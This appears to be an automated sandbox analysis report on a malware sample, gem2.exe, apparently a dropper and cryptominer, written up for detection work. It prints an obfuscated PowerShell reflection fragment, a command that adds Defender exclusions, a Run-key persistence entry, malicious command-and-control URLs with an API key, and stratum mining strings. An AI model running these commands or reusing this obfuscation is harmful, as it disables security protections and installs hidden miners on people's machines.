$_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$kpBUo
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", ProcessId: 4684, ProcessName: powershell.exe
Sigma detected: Suspect Svchost Activity
Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 7628, ProcessName: svchost.exe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\gem2.exe, ProcessId: 2692, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft-f4855f59e0
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", ProcessId: 4684, ProcessName: powershell.exe
Sigma detected: Uncommon Svchost Parent Process
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 7628, ProcessName: svchost.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -s https://api.ipify.org, CommandLine: curl -s https://api.ipify.org, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: C:\Windows\System32\svchost.exe, ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 7628, ParentProcessName: svchost.exe, ProcessCommandLine: curl -s https://api.ipify.org, ProcessId: 2236, ProcessName: curl.exe
Sigma detected: Use Short Name Path in Command Line
Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 8104, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe" , ProcessId: 8168, ProcessName: WinDrive-f4855f59e0.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'", ProcessId: 4684, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 2692, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 7628, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpur32.dllPAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuAvira URL Cloud: Label: malware
Source: https://pastesnap.com/(WAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpPKU2UAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuAvira URL Cloud: Label: malware
Source: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt/Avira URL Cloud: Label: malware
Source: https://pastesnap.com/STB/cGFzdGVzbmFwM.txt5Avira URL Cloud: Label: malware
Source: https://pastesnap.com/STB/cGFzdGVzbmFwR.txtAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpYg==M.txtsage.cfdapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpu4cAvira URL Cloud: Label: malware
Source: https://pastesnap.com/STB/cGFzdGVzbmFwM.txtAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60Avira URL Cloud: Label: malware
Source: https://pastesnap.com/0xYAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpuebAvira URL Cloud: Label: malware
Source: https://pastesnap.com/KhAvira URL Cloud: Label: malware
Source: https://pastesnap.com/API/cGFzdGVzbmFwEP.phpc78da9f679b97f91d60https://pastesnap.com/API/cGFzdGVzbmFAvira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeReversingLabs: Detection: 52%
Source: C:\Windows\SysWOW64\$LMX-f4855f59e0.exeReversingLabs: Detection: 52%
Source: C:\Windows\System32\System-f4855f59e0.exeReversingLabs: Detection: 52%
Multi AV Scanner detection for submitted file
Source: gem2.exeReversingLabs: Detection: 52%
Source: gem2.exeVirustotal: Detection: 62%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exeJoe Sandbox ML: detected
Source: C:\Windows\System32\System-f4855f59e0.exeJoe Sandbox ML: detected
Source: C:\Windows\SysWOW64\$LMX-f4855f59e0.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: gem2.exeJoe Sandbox ML: detected
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: 14_2_00007FF6A54A51C0 Concurrency::details::WorkQueue::IsStructuredEmpty,CryptStringToBinaryA,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::WorkQueue::IsStructuredEmpty,CryptStringToBinaryA,14_2_00007FF6A54A51C0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,16_2_00000173D01B04A6
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01974E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,16_2_00000173D01974E0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0197560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D0197560
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01975F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D01975F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01816F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D01816F0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0181820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,16_2_00000173D0181820
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01818B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D01818B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01818A0 CryptHashData,16_2_00000173D01818A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B28A0 CertGetNameStringW,malloc,CertFindExtension,CryptDecodeObjectEx,free,free,CertFreeCertificateContext,16_2_00000173D01B28A0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D0162B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,16_2_00000173D0162B80
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,16_2_00000173D01B2CC0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01AFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,16_2_00000173D01AFF30
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173D01B31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,16_2_00000173D01B31F0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D16351C0 Concurrency::details::WorkQueue::IsStructuredEmpty,CryptStringToBinaryA,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::WorkQueue::IsStructuredEmpty,CryptStringToBinaryA,17_2_00007FF7D16351C0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,25_2_00401000
Source: C:\Windows\System32\svchost.exeCode function: -----BEGIN PUBLIC KEY-----16_2_00000173D01B4560
Source: svchost.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Windows\System32\svchost.exeCode function: mov dword ptr [rbp+04h], 424D53FFh16_2_00000173D0198DE0

Bitcoin Miner

barindex
Found strings related to Crypto-Mining
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: --url stratum+tcp://
Source: svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpString found in binary or memory: --url stratum+tcp://
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49727 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49828 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49836 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49842 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.7:49847 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49850 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49870 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49887 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49899 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49926 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49936 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49957 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50010 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50030 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50046 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50066 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50083 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50099 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50120 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50136 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50157 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50174 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50212 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50223 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50234 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50245 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50256 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50267 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50280 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50291 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50313 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50324 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50335 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50346 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50357 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50368 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50379 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50390 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50401 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50412 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50423 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50434 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50445 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50456 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50467 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50478 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50489 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50500 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50512 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50523 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50534 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50547 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50554 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50573 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50574 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50596 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50595 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50614 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.60.172:443 -> 192.168.2.7:50621 version: TLS 1.2
Source: gem2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\User\vcpkg\buildtrees\jsoncpp\x64-windows-rel\bin\jsoncpp.pdb source: svchost.exe, 00000010.00000002.2552768573.00000173CDFA3000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\7\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: svchost.exe, 00000010.00000002.2553572741.00000173CDFF5000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\2\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: svchost.exe, 00000010.00000002.2553168813.00000173CDFE0000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\jsoncpp\x64-windows-rel\bin\jsoncpp.pdb%%" source: svchost.exe, 00000010.00000002.2552768573.00000173CDFA3000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: svchost.exe, 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: svchost.exe, 00000010.00000002.2554832457.00000173CF9BF000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 00000010.00000002.2557783221.00000173CFFDA000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\User\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: svchost.exe, 00000010.00000002.2554832457.00000173CF9BF000.00000002.10000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
